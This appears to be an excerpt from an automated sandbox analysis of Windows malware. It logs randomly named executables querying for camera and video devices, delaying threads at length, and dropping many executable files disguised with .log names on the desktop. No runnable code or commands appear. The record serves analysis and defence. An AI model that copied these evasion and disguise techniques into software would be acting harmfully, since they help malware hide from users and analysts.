Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Memory allocated: 750000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Memory allocated: 1A680000 memory reserve | memory write watch
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Memory allocated: C60000 memory reserve | memory write watch
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Memory allocated: 1AB80000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 600000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 599871
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 599765
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 599655
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 598696
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 3600000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 598586
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 598125
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 597500
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 596828
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 596344
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 595891
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 595406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 595109
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 594781
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 594516
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 594234
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 593859
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 593516
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 593172
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 592859
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 592437
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 592172
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 591781
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 591437
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 591109
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 590640
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 590422
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 590094
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 589562
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 589109
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 588719
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 588266
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 587750
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 587250
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 586672
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 586250
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 585922
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 585469
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 585062
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 584547
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 584171
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583969
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583772
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583564
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583231
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583050
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582859
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582703
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582536
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582380
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582094
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 300000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 580047
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579762
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579547
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579344
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579156
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578969
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578810
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578609
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578226
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578085
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577937
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577734
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577566
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577219
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577031
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576797
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576594
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576404
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576219
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575968
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575828
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575656
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575437
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575223
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575094
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574984
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574866
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574731
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574622
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574514
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574297
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574187
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574077
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573954
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573810
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573683
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573531
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573418
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573299
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573172
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573062
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 572953
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 572841
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 572734
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1889
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1979
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2448
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2065
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2652
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Window / User API: threadDelayed 5162
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Window / User API: threadDelayed 4168
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eFdBcvYu.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KySWwqSG.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\iDXAsssK.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UnQDGoMO.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wiMZKnmL.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DSloixRU.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bXqTeyrX.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aOmKVzXA.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\owAZVXxy.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hMaKxNSp.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nnwRMYdb.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XgzcXCre.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HFjxfdnr.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NyMWIIsf.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fTLbMRgr.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JCfvgtvD.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AZWFwAgV.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uodzyDCn.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hPTsHewM.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CVKgMxCZ.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jsvAFsni.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DYQGISGu.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OvoeeIHa.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lCRBFKSi.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RoXDuWmq.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AhGYbjHb.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ssViDqmS.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AHvxDOtC.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hGwsXsdP.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dZcBAhwS.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TlyLQWBk.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OygMnZlw.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WjYUBCcj.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zZCPRjnE.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TcbLgjio.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rqDqMXbo.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ajmLslvZ.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wlEHTDRh.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ICLFBdCl.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rhfqclHr.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qZchTloU.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uuIRZZqN.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YVXcjCmC.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wacGgDMF.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lFJjObwF.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WKOtegOK.log Jump to dropped file
